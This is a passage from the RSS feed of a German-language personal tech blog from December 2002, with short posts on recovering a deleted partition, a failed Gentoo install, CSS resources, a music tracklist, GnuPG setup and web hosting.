  13406.    <description><![CDATA[Wer das Bedürfnis hat, der Welt etwas mitzuteilen, kreativ zu sein, Kommunikation zu betreiben, zu spielen, literarische Kunstwerke zu veröffentlichen, das Internet mitzugestalten, seine Meinung zu publizieren, Politik zu machen wollen oder sich einfach mit einem Wiki auszutoben, der hat nun <a href="https://phiki.x-way.org/"><b>hier</b></a> die Möglichkeit dazu. ;-)<br><br>Auf <a href="https://phiki.x-way.org/"><b>https://phiki.x-way.org/</b></a> dürft ihr eurer Fantasie freien Lauf lassen, damit auch Leute die Gelegenheit haben, etwas 'ins Internet zu stellen', die kein Weblog und keine Homepage haben. Also: Schreibt!
  13407. ]]></description>
  13408.    <content:encoded><![CDATA[Wer das Bedürfnis hat, der Welt etwas mitzuteilen, kreativ zu sein, Kommunikation zu betreiben, zu spielen, literarische Kunstwerke zu veröffentlichen, das Internet mitzugestalten, seine Meinung zu publizieren, Politik zu machen wollen oder sich einfach mit einem Wiki auszutoben, der hat nun <a href="https://phiki.x-way.org/"><b>hier</b></a> die Möglichkeit dazu. ;-)<br><br>Auf <a href="https://phiki.x-way.org/"><b>https://phiki.x-way.org/</b></a> dürft ihr eurer Fantasie freien Lauf lassen, damit auch Leute die Gelegenheit haben, etwas 'ins Internet zu stellen', die kein Weblog und keine Homepage haben. Also: Schreibt!
  13409. ]]></content:encoded>
  13410.  </item>
  13411.  
  13412.  <item>
  13413.    <title>Nacht des Schreckens</title>
  13414.    <link>https://blog.x-way.org/Tech/2002/12/28/Nacht_des_Schreckens.html</link>
  13415.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=234</guid>
  13416.    <dc:creator>Andreas Jaggi</dc:creator>
  13417.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13418.    <pubDate>Sat, 28 Dec 2002 14:16:00 +0000</pubDate>
  13419.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  13420.    <description><![CDATA[Gestern Abend, beim Linuxneuaufsetzen, als ich mit cfdisk herumgewerkelt habe, hatte ich wohl eine ganz schwache Sekunde: ich habe die $HOME-Partition gelöscht und die Partitionstabelle gespeichert!
  13421. <br>Als ich es ein paar Minuten später realisierte, bin ich verständlicherweise fast vom Stuhl gefallen. Also: Computer sofort abstellen, damit die Chancen möglichst gross bleiben, ein paar Daten wiederherzustellen. Dann neu booten mit Partiton-Magic  und mit 'Wiederherstellen' herumüben. Aber das blieb ohne Erfolg, Partition-Magic wollte von der Partition nichts gesehen haben. Also nochmal Computer ausschalten. Mit dem Zweitcomputer im Internet nach 'Datenrettung fat-partition gelöscht' suchen und ein paar Seiten zum Thema finden. (<a href="https://web.archive.org/web/20030412184329/http://www.tecchannel.de/hardware/651/index.html"><b>Artikel zum Thema</b></a>, <a href="http://www.ontrack.de/"><b>OnTrack.de</b></a>, <a href="http://www.datenretter.de/"><b>Datenretter.de</b></a>). Schliesslich finde ich <a href="https://web.archive.org/web/20021012120141/http://www.pcinspector.de/file_recovery/welcome.htm"><b>dieses Tool</b></a>. Nun bei meinem Computer die HDs so umhängen, dass die alte IBM-Platte bootet (hat glücklicherweise noch ein W2K drauf). Hätte nicht gedacht, dass ich die nocheinmal benutzen würde. Also, das Tool draufgetan und mit der alten Platte geboote, die zu bearbeitende als Slave angehängt. Mit dem Tool die Festplatte nach Partitionen und Ordnern und sonstigen Daten abgesucht, bit für bit nehme ich an (jedenfalls hat es so lange gedauert ;-)
  13422. <br>Zu meinem erfreulichen Erstaunen hat es sogar etwas gefunden: 36 Partitionen, von insgesamt 15 die auf der Platte sind und 4 die im durchsuchten Bereich liegen. Beim anschauen der gefundenen Daten durfte ich feststellen, dass noch alle Daten erhalten waren. Die 36 Partitionen kamen vermutlich weil ich einen Ordner mit ISO-Images verschiedener Unix-Distributionen hatte. Nun begann ich die Daten auf die alte Festplatte zu speichern, wozu ich dort fast alle Programme löschen musste, um Platz zu schaffen *g*
  13423. <br>Nachdem diese langwierige Prozedur abgeschlossen war Rechner herunterfahren. Die HDs wieder neu umhängen, so das wieder meine Platte am Master
  13424. hängt. Mit der Gentoo-Live-CD booten und mittels cfdisk die Partition neu erstellen und den Typ wieder auf Fat32 setzen. Neu booten und erfreut feststellen, dass der MBR mit einem GRUB gefüllt ist, das noch nicht vollständig installiert ist, da ich ja die Linuxinstallation abgebrochen habe. Also erneutes Suchen im Web. Beim SUSE-SUpport wurde ich schliesslich fündig: W2K-Installations-Disk einlegen und neu booten, dann R für reparieren und dann K für Wiederherstellungskonsole, W2K-Partition auswählen und Admin-Passwort eingeben. Dann mittels fixmbr den MBR wiederherstellen und mit exit neu booten. Windows aufstarten lassen. Einloggen. Arbeitsplatz öffnen, um die geretteten Dateien von der alten HD zurückzukopieren. Zu meine grossen Erstaunen, finde ist die neu erstellte Partition schon so beschriftet, wie die alte war! Ein Doppelklick darauf bringt erstaunlicherwese den Inhalt der alten Partition zum Vorschein, es ist alles noch da! Windows hat also gar nicht bemerkt, dass die Partition eigentlich neu ist und hat einfach die alten Daten zugeordnet! So habe ich dann das zurückkopieren der geretteten Daten bleiben lassen. Den Computer heruntergefahren und die alte HD wieder ausgebaut. Noch ein letzter Start von Windows, alle Daten sind noch da, und dann ab ins Bett, um <u>7 Uhr Morgens !!!</u>
  13425. <br><br>Wenn ihr also mal eine Nacht nicht schlafen wollt, könnt ihr ja eure $HOME-Partition löschen, da bleibt die Spannung bis zum Schluss erhalten, garantiert! ;-)
  13426. ]]></description>
  13427.    <content:encoded><![CDATA[Gestern Abend, beim Linuxneuaufsetzen, als ich mit cfdisk herumgewerkelt habe, hatte ich wohl eine ganz schwache Sekunde: ich habe die $HOME-Partition gelöscht und die Partitionstabelle gespeichert!
  13428. <br>Als ich es ein paar Minuten später realisierte, bin ich verständlicherweise fast vom Stuhl gefallen. Also: Computer sofort abstellen, damit die Chancen möglichst gross bleiben, ein paar Daten wiederherzustellen. Dann neu booten mit Partiton-Magic  und mit 'Wiederherstellen' herumüben. Aber das blieb ohne Erfolg, Partition-Magic wollte von der Partition nichts gesehen haben. Also nochmal Computer ausschalten. Mit dem Zweitcomputer im Internet nach 'Datenrettung fat-partition gelöscht' suchen und ein paar Seiten zum Thema finden. (<a href="https://web.archive.org/web/20030412184329/http://www.tecchannel.de/hardware/651/index.html"><b>Artikel zum Thema</b></a>, <a href="http://www.ontrack.de/"><b>OnTrack.de</b></a>, <a href="http://www.datenretter.de/"><b>Datenretter.de</b></a>). Schliesslich finde ich <a href="https://web.archive.org/web/20021012120141/http://www.pcinspector.de/file_recovery/welcome.htm"><b>dieses Tool</b></a>. Nun bei meinem Computer die HDs so umhängen, dass die alte IBM-Platte bootet (hat glücklicherweise noch ein W2K drauf). Hätte nicht gedacht, dass ich die nocheinmal benutzen würde. Also, das Tool draufgetan und mit der alten Platte geboote, die zu bearbeitende als Slave angehängt. Mit dem Tool die Festplatte nach Partitionen und Ordnern und sonstigen Daten abgesucht, bit für bit nehme ich an (jedenfalls hat es so lange gedauert ;-)
  13429. <br>Zu meinem erfreulichen Erstaunen hat es sogar etwas gefunden: 36 Partitionen, von insgesamt 15 die auf der Platte sind und 4 die im durchsuchten Bereich liegen. Beim anschauen der gefundenen Daten durfte ich feststellen, dass noch alle Daten erhalten waren. Die 36 Partitionen kamen vermutlich weil ich einen Ordner mit ISO-Images verschiedener Unix-Distributionen hatte. Nun begann ich die Daten auf die alte Festplatte zu speichern, wozu ich dort fast alle Programme löschen musste, um Platz zu schaffen *g*
  13430. <br>Nachdem diese langwierige Prozedur abgeschlossen war Rechner herunterfahren. Die HDs wieder neu umhängen, so das wieder meine Platte am Master
  13431. hängt. Mit der Gentoo-Live-CD booten und mittels cfdisk die Partition neu erstellen und den Typ wieder auf Fat32 setzen. Neu booten und erfreut feststellen, dass der MBR mit einem GRUB gefüllt ist, das noch nicht vollständig installiert ist, da ich ja die Linuxinstallation abgebrochen habe. Also erneutes Suchen im Web. Beim SUSE-SUpport wurde ich schliesslich fündig: W2K-Installations-Disk einlegen und neu booten, dann R für reparieren und dann K für Wiederherstellungskonsole, W2K-Partition auswählen und Admin-Passwort eingeben. Dann mittels fixmbr den MBR wiederherstellen und mit exit neu booten. Windows aufstarten lassen. Einloggen. Arbeitsplatz öffnen, um die geretteten Dateien von der alten HD zurückzukopieren. Zu meine grossen Erstaunen, finde ist die neu erstellte Partition schon so beschriftet, wie die alte war! Ein Doppelklick darauf bringt erstaunlicherwese den Inhalt der alten Partition zum Vorschein, es ist alles noch da! Windows hat also gar nicht bemerkt, dass die Partition eigentlich neu ist und hat einfach die alten Daten zugeordnet! So habe ich dann das zurückkopieren der geretteten Daten bleiben lassen. Den Computer heruntergefahren und die alte HD wieder ausgebaut. Noch ein letzter Start von Windows, alle Daten sind noch da, und dann ab ins Bett, um <u>7 Uhr Morgens !!!</u>
  13432. <br><br>Wenn ihr also mal eine Nacht nicht schlafen wollt, könnt ihr ja eure $HOME-Partition löschen, da bleibt die Spannung bis zum Schluss erhalten, garantiert! ;-)
  13433. ]]></content:encoded>
  13434.  </item>
  13435.  
  13436.  <item>
  13437.    <title>CSS</title>
  13438.    <link>https://blog.x-way.org/Webdesign/2002/12/27/CSS.html</link>
  13439.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=233</guid>
  13440.    <dc:creator>Andreas Jaggi</dc:creator>
  13441.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13442.    <pubDate>Fri, 27 Dec 2002 13:48:00 +0000</pubDate>
  13443.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13444.    <description><![CDATA[<a href="http://www.stichpunkt.de/css/"><b>Hier</b></a> hat es unter anderem einige Beispiellayouts, tabellenlos versteht sich.<br><a href="https://web.archive.org/web/20030207081638/http://www.scottandrew.com/weblog/2002_10"><b>Hier</b></a> hat es einige Links zu tabellenlosen Seiten und zu CSS-Tutorials.<br><a href="http://www.meryl.net/css/"><b>Hier</b></a>  hat es Links zu 900 tabellenlosen Websites.
  13445. ]]></description>
  13446.    <content:encoded><![CDATA[<a href="http://www.stichpunkt.de/css/"><b>Hier</b></a> hat es unter anderem einige Beispiellayouts, tabellenlos versteht sich.<br><a href="https://web.archive.org/web/20030207081638/http://www.scottandrew.com/weblog/2002_10"><b>Hier</b></a> hat es einige Links zu tabellenlosen Seiten und zu CSS-Tutorials.<br><a href="http://www.meryl.net/css/"><b>Hier</b></a>  hat es Links zu 900 tabellenlosen Websites.
  13447. ]]></content:encoded>
  13448.  </item>
  13449.  
  13450.  <item>
  13451.    <title>Bonnes Fêtes!</title>
  13452.    <link>https://blog.x-way.org/Misc/2002/12/24/34.html</link>
  13453.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=232</guid>
  13454.    <dc:creator>Andreas Jaggi</dc:creator>
  13455.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13456.    <pubDate>Tue, 24 Dec 2002 16:51:01 +0000</pubDate>
  13457.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13458.    <description><![CDATA[Bonnes Fêtes!
  13459. ]]></description>
  13460.    <content:encoded><![CDATA[Bonnes Fêtes!
  13461. ]]></content:encoded>
  13462.  </item>
  13463.  
  13464.  <item>
  13465.    <title>Fröhliche Weihnachten</title>
  13466.    <link>https://blog.x-way.org/Misc/2002/12/24/23.html</link>
  13467.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=231</guid>
  13468.    <dc:creator>Andreas Jaggi</dc:creator>
  13469.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13470.    <pubDate>Tue, 24 Dec 2002 16:51:00 +0000</pubDate>
  13471.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13472.    <description><![CDATA[Fröhliche Weihnachten
  13473. ]]></description>
  13474.    <content:encoded><![CDATA[Fröhliche Weihnachten
  13475. ]]></content:encoded>
  13476.  </item>
  13477.  
  13478.  <item>
  13479.    <title>Mist</title>
  13480.    <link>https://blog.x-way.org/Linux/2002/12/23/Mist.html</link>
  13481.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=230</guid>
  13482.    <dc:creator>Andreas Jaggi</dc:creator>
  13483.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13484.    <pubDate>Mon, 23 Dec 2002 15:39:00 +0000</pubDate>
  13485.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13486.    <description><![CDATA[Eigentlich sollte hier eine Meldung über die erfolgreiche Installation von <a href="http://www.gentoo.org"><b>Gentoo</b></a> stehen, aber irgendetwas ist da wohl schief gelaufen, denn ich kann Gentoo zwar ohne Probleme starten, aber wenn ich z.b. <span style="font-family: monospace;">emerge sync</span> eingebe, erscheint ein Fehler, dass die URL nicht aufgelöst werden konnte und auch wenn ich <span style="font-family: monospace;">ping waterwave.ch</span> oder so eingebe, erscheint die Fehlermeldung; folglich muss ich wohl die ganze Installation noch einmal machen :-(
  13487. ]]></description>
  13488.    <content:encoded><![CDATA[Eigentlich sollte hier eine Meldung über die erfolgreiche Installation von <a href="http://www.gentoo.org"><b>Gentoo</b></a> stehen, aber irgendetwas ist da wohl schief gelaufen, denn ich kann Gentoo zwar ohne Probleme starten, aber wenn ich z.b. <span style="font-family: monospace;">emerge sync</span> eingebe, erscheint ein Fehler, dass die URL nicht aufgelöst werden konnte und auch wenn ich <span style="font-family: monospace;">ping waterwave.ch</span> oder so eingebe, erscheint die Fehlermeldung; folglich muss ich wohl die ganze Installation noch einmal machen :-(
  13489. ]]></content:encoded>
  13490.  </item>
  13491.  
  13492.  <item>
  13493.    <title>Ferien</title>
  13494.    <link>https://blog.x-way.org/Linux/2002/12/21/Ferien.html</link>
  13495.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=229</guid>
  13496.    <dc:creator>Andreas Jaggi</dc:creator>
  13497.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13498.    <pubDate>Sat, 21 Dec 2002 11:56:00 +0000</pubDate>
  13499.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13500.    <description><![CDATA[So, die Schule in diesem Jahr haben wir auch überlebt, sogar der Absturz gestern Abend war nicht so schlimm ausgefallen (durfte einfach im Zug die Augen nicht schliessen, weil's mich sonst vornüber geworfen hätte, weil alles so gedreht hat *g*). Einen Screenshot für die Sammlung von <a href="http://sec.digigeek.net/"><b>sec</b></a>, <a href="http://www.robwei.de/"><b>rw</b></a> und <a href="http://kniebes.com/"><b>mk</b></a> gibt's wenn ich <a href="http://gentoo.org/"><b>Gentoo</b></a> neu installiert habe ...
  13501. ]]></description>
  13502.    <content:encoded><![CDATA[So, die Schule in diesem Jahr haben wir auch überlebt, sogar der Absturz gestern Abend war nicht so schlimm ausgefallen (durfte einfach im Zug die Augen nicht schliessen, weil's mich sonst vornüber geworfen hätte, weil alles so gedreht hat *g*). Einen Screenshot für die Sammlung von <a href="http://sec.digigeek.net/"><b>sec</b></a>, <a href="http://www.robwei.de/"><b>rw</b></a> und <a href="http://kniebes.com/"><b>mk</b></a> gibt's wenn ich <a href="http://gentoo.org/"><b>Gentoo</b></a> neu installiert habe ...
  13503. ]]></content:encoded>
  13504.  </item>
  13505.  
  13506.  <item>
  13507.    <title>Geldmacherei</title>
  13508.    <link>https://blog.x-way.org/Misc/2002/12/16/Geldmacherei.html</link>
  13509.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=228</guid>
  13510.    <dc:creator>Andreas Jaggi</dc:creator>
  13511.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13512.    <pubDate>Mon, 16 Dec 2002 22:44:00 +0000</pubDate>
  13513.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13514.    <description><![CDATA[Im neuen <a href="http://heise.de/ct/"><b>c't</b></a> hat es einen Artikel über die neue 64-bit-CPU von AMD und im neuen <a href="http://heise.de/ix/"><b>iX</b></a> ist eine Artikel über die neue 64-bit-CPU von Intel.<br>Wenn ich nun die beiden Prozessoren vergleichen will, muss ich nun beide Magazine kaufen?<br>Verdammte Kapitalisten!
  13515. ]]></description>
  13516.    <content:encoded><![CDATA[Im neuen <a href="http://heise.de/ct/"><b>c't</b></a> hat es einen Artikel über die neue 64-bit-CPU von AMD und im neuen <a href="http://heise.de/ix/"><b>iX</b></a> ist eine Artikel über die neue 64-bit-CPU von Intel.<br>Wenn ich nun die beiden Prozessoren vergleichen will, muss ich nun beide Magazine kaufen?<br>Verdammte Kapitalisten!
  13517. ]]></content:encoded>
  13518.  </item>
  13519.  
  13520.  <item>
  13521.    <title>Winter</title>
  13522.    <link>https://blog.x-way.org/Webdesign/2002/12/15/Winter.html</link>
  13523.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=227</guid>
  13524.    <dc:creator>Andreas Jaggi</dc:creator>
  13525.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13526.    <pubDate>Sun, 15 Dec 2002 04:26:00 +0000</pubDate>
  13527.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13528.    <description><![CDATA[Passend zur Jahreszeit ist jetzt <a href="http://waterwave.ch/weblog/preferences.php?layout=plain%202"><b>plain 2</b></a> das neue Standard-Layout.
  13529. ]]></description>
  13530.    <content:encoded><![CDATA[Passend zur Jahreszeit ist jetzt <a href="http://waterwave.ch/weblog/preferences.php?layout=plain%202"><b>plain 2</b></a> das neue Standard-Layout.
  13531. ]]></content:encoded>
  13532.  </item>
  13533.  
  13534.  <item>
  13535.    <title>Winterswap</title>
  13536.    <link>https://blog.x-way.org/Misc/2002/12/14/12.html</link>
  13537.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=207</guid>
  13538.    <dc:creator>Andreas Jaggi</dc:creator>
  13539.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13540.    <pubDate>Sat, 14 Dec 2002 00:00:00 +0000</pubDate>
  13541.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13542.    <description><![CDATA[Noch die Tracklist von meiner <a href="https://web.archive.org/web/20021214000000/http://fischergrube.de/swap/"><b>Winterswap</b></a>-Disc:<br><br>1. <a href="https://web.archive.org/web/20021214000000/http://manuchao.net/"><b>Manu Chao</b></a> - Denia<br>2. In-Grid - Tu Es Foutu<br>3. <a href="https://web.archive.org/web/20021214000000/http://www.nerinapallot.co.uk/"><b>Nerina Pallot</b></a> - Patience<br>4. <a href="https://web.archive.org/web/20021214000000/http://univers.mylene-farmer.com"><b>Mylène Farmer</b></a> - Piste 1<br>5. <a href="https://web.archive.org/web/20021214000000/http://www.kateryan.be/"><b>Kate Ryan</b></a> - Désenchantée<br>6. <a href="https://web.archive.org/web/20021214000000/http://www.lehammondinferno.com/"><b>Le Hammond Inferno</b></a> - An Apple A Day<br>7. <a href="https://web.archive.org/web/20021214000000/http://special.the-raft.com/theverve/"><b>The Verve</b></a> - Bitter Sweet Symphony<br>8. <a href="https://web.archive.org/web/20021214000000/http://www.teteonline.com/"><b>Tété</b></a> -  L'abominable Hyde<br>9. <a href="https://web.archive.org/web/20021214000000/http://www.louiseattaque.com/"><b>Louise Attaque</b></a> - Léa<br>10. <a href="https://web.archive.org/web/20021214000000/http://www.manaufficiel.com/"><b>Manau</b></a> - La Tribu De Dana<br>11. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Son style 1<br>12. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Comme Elle Vient<br>13. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - En Route pour la Joie<br>14. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Johnny Colère<br>15. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - It Spurts<br>16. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Lost<br>17. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Fin de Siècle<br>18. <a href="https://web.archive.org/web/20021214000000/http://www.ska-p.net/"><b>Ska-P</b></a> - Legalisation<br>19. <a href="https://web.archive.org/web/20021214000000/http://attaque77.com/"><b>Attaque 77</b></a> - Que vas<br>20. <a href="https://web.archive.org/web/20021214000000/http://www.disquesmpv.com/anonymusmetal/"><b>Anonymus </b></a>- Virtually Insane
  13543. ]]></description>
  13544.    <content:encoded><![CDATA[Noch die Tracklist von meiner <a href="https://web.archive.org/web/20021214000000/http://fischergrube.de/swap/"><b>Winterswap</b></a>-Disc:<br><br>1. <a href="https://web.archive.org/web/20021214000000/http://manuchao.net/"><b>Manu Chao</b></a> - Denia<br>2. In-Grid - Tu Es Foutu<br>3. <a href="https://web.archive.org/web/20021214000000/http://www.nerinapallot.co.uk/"><b>Nerina Pallot</b></a> - Patience<br>4. <a href="https://web.archive.org/web/20021214000000/http://univers.mylene-farmer.com"><b>Mylène Farmer</b></a> - Piste 1<br>5. <a href="https://web.archive.org/web/20021214000000/http://www.kateryan.be/"><b>Kate Ryan</b></a> - Désenchantée<br>6. <a href="https://web.archive.org/web/20021214000000/http://www.lehammondinferno.com/"><b>Le Hammond Inferno</b></a> - An Apple A Day<br>7. <a href="https://web.archive.org/web/20021214000000/http://special.the-raft.com/theverve/"><b>The Verve</b></a> - Bitter Sweet Symphony<br>8. <a href="https://web.archive.org/web/20021214000000/http://www.teteonline.com/"><b>Tété</b></a> -  L'abominable Hyde<br>9. <a href="https://web.archive.org/web/20021214000000/http://www.louiseattaque.com/"><b>Louise Attaque</b></a> - Léa<br>10. <a href="https://web.archive.org/web/20021214000000/http://www.manaufficiel.com/"><b>Manau</b></a> - La Tribu De Dana<br>11. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Son style 1<br>12. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Comme Elle Vient<br>13. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - En Route pour la Joie<br>14. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Johnny Colère<br>15. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - It Spurts<br>16. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Lost<br>17. <a href="https://web.archive.org/web/20021214000000/http://www.noirdez.com/"><b>Noir Désir</b></a> - Fin de Siècle<br>18. <a href="https://web.archive.org/web/20021214000000/http://www.ska-p.net/"><b>Ska-P</b></a> - Legalisation<br>19. <a href="https://web.archive.org/web/20021214000000/http://attaque77.com/"><b>Attaque 77</b></a> - Que vas<br>20. <a href="https://web.archive.org/web/20021214000000/http://www.disquesmpv.com/anonymusmetal/"><b>Anonymus </b></a>- Virtually Insane
  13545. ]]></content:encoded>
  13546.  </item>
  13547.  
  13548.  <item>
  13549.    <title>Enigmail - GnuPP</title>
  13550.    <link>https://blog.x-way.org/Misc/2002/12/12/Enigmail_-_GnuPP.html</link>
  13551.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=226</guid>
  13552.    <dc:creator>Andreas Jaggi</dc:creator>
  13553.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13554.    <pubDate>Thu, 12 Dec 2002 20:37:00 +0000</pubDate>
  13555.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13556.    <description><![CDATA[So, nun kann auch ich sicher kommunizieren ;-)<br>Mit <a href="https://enigmail.net/"><b>Enigmail</b></a> und <a href="http://www.gnupp.de"><b>GnuPP</b></a>.<br><br>Public Key ist <a href="https://blog.x-way.org/stuff/publickey.txt"><b>hier</b></a>
  13557. ]]></description>
  13558.    <content:encoded><![CDATA[So, nun kann auch ich sicher kommunizieren ;-)<br>Mit <a href="https://enigmail.net/"><b>Enigmail</b></a> und <a href="http://www.gnupp.de"><b>GnuPP</b></a>.<br><br>Public Key ist <a href="https://blog.x-way.org/stuff/publickey.txt"><b>hier</b></a>
  13559. ]]></content:encoded>
  13560.  </item>
  13561.  
  13562.  <item>
  13563.    <title>Adventskalender</title>
  13564.    <link>https://blog.x-way.org/Misc/2002/12/12/Adventskalender.html</link>
  13565.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=225</guid>
  13566.    <dc:creator>Andreas Jaggi</dc:creator>
  13567.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13568.    <pubDate>Thu, 12 Dec 2002 18:31:00 +0000</pubDate>
  13569.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13570.    <description><![CDATA[<a href="https://web.archive.org/web/20021225134634/http://www.vnunet.de/internet-pro/workshops2/detail_buecher.asp?ArticleID=5892&amp;AT=17"><b>Hier</b></a> kann man bis zum 24. Dezember insgesamt 8 Bücher gratis herunterladen. ABer jedes Buch nur für eine beschränkte Zeit, fleissiges vorbeischauen lohnt sich!
  13571. ]]></description>
  13572.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021225134634/http://www.vnunet.de/internet-pro/workshops2/detail_buecher.asp?ArticleID=5892&amp;AT=17"><b>Hier</b></a> kann man bis zum 24. Dezember insgesamt 8 Bücher gratis herunterladen. ABer jedes Buch nur für eine beschränkte Zeit, fleissiges vorbeischauen lohnt sich!
  13573. ]]></content:encoded>
  13574.  </item>
  13575.  
  13576.  <item>
  13577.    <title>Geschafft!</title>
  13578.    <link>https://blog.x-way.org/Misc/2002/12/12/Geschafft.html</link>
  13579.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=224</guid>
  13580.    <dc:creator>Andreas Jaggi</dc:creator>
  13581.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13582.    <pubDate>Thu, 12 Dec 2002 08:40:00 +0000</pubDate>
  13583.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13584.    <description><![CDATA[So, nun liegt <a href="http://waterwave.ch/"><b>waterwave.ch</b></a> bei <a href="http://hostpoint.ch/"><b>hostpoint.ch</b></a> und nicht mehr bei dem anderen Server. Nun beginnt eine Zeit, in der man für sein Geld auch einen entsprechenden Service <b>ohne Ausfälle</b> bekommt ;-)
  13585. ]]></description>
  13586.    <content:encoded><![CDATA[So, nun liegt <a href="http://waterwave.ch/"><b>waterwave.ch</b></a> bei <a href="http://hostpoint.ch/"><b>hostpoint.ch</b></a> und nicht mehr bei dem anderen Server. Nun beginnt eine Zeit, in der man für sein Geld auch einen entsprechenden Service <b>ohne Ausfälle</b> bekommt ;-)
  13587. ]]></content:encoded>
  13588.  </item>
  13589.  
  13590.  <item>
  13591.    <title>HTML 2.0</title>
  13592.    <link>https://blog.x-way.org/Webdesign/2002/12/08/HTML_20.html</link>
  13593.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=223</guid>
  13594.    <dc:creator>Andreas Jaggi</dc:creator>
  13595.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13596.    <pubDate>Sun, 08 Dec 2002 14:01:00 +0000</pubDate>
  13597.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13598.    <description><![CDATA[So aus lauter Freude hat's jetzt ein HTML 2.0 konformes Layout gegeben ;-)
  13599. ]]></description>
  13600.    <content:encoded><![CDATA[So aus lauter Freude hat's jetzt ein HTML 2.0 konformes Layout gegeben ;-)
  13601. ]]></content:encoded>
  13602.  </item>
  13603.  
  13604.  <item>
  13605.    <title>Inhotus</title>
  13606.    <link>https://blog.x-way.org/Misc/2002/12/07/Inhotus.html</link>
  13607.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=222</guid>
  13608.    <dc:creator>Andreas Jaggi</dc:creator>
  13609.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13610.    <pubDate>Sat, 07 Dec 2002 20:16:00 +0000</pubDate>
  13611.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13612.    <description><![CDATA[<a href="#" class="gone"><b>Inhotus</b></a> ist ein Systemmonitor für Windows ähnlich wie GKrellM unter Linux.<br><br>Gefunden auf <a href="https://web.archive.org/web/20030130154214/http://www.skinnables.org/"><b>skinnables.org</b></a>
  13613. ]]></description>
  13614.    <content:encoded><![CDATA[<a href="#" class="gone"><b>Inhotus</b></a> ist ein Systemmonitor für Windows ähnlich wie GKrellM unter Linux.<br><br>Gefunden auf <a href="https://web.archive.org/web/20030130154214/http://www.skinnables.org/"><b>skinnables.org</b></a>
  13615. ]]></content:encoded>
  13616.  </item>
  13617.  
  13618.  <item>
  13619.    <title>Design</title>
  13620.    <link>https://blog.x-way.org/Webdesign/2002/12/07/Design.html</link>
  13621.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=221</guid>
  13622.    <dc:creator>Andreas Jaggi</dc:creator>
  13623.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13624.    <pubDate>Sat, 07 Dec 2002 19:12:00 +0000</pubDate>
  13625.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13626.    <description><![CDATA[Maintenant vous pouvez changer le layout de mon weblog au réglage<br><br><a href="http://phrenologik.free.fr/"><b>phrenologik</b></a> est une site à tendance "dark"
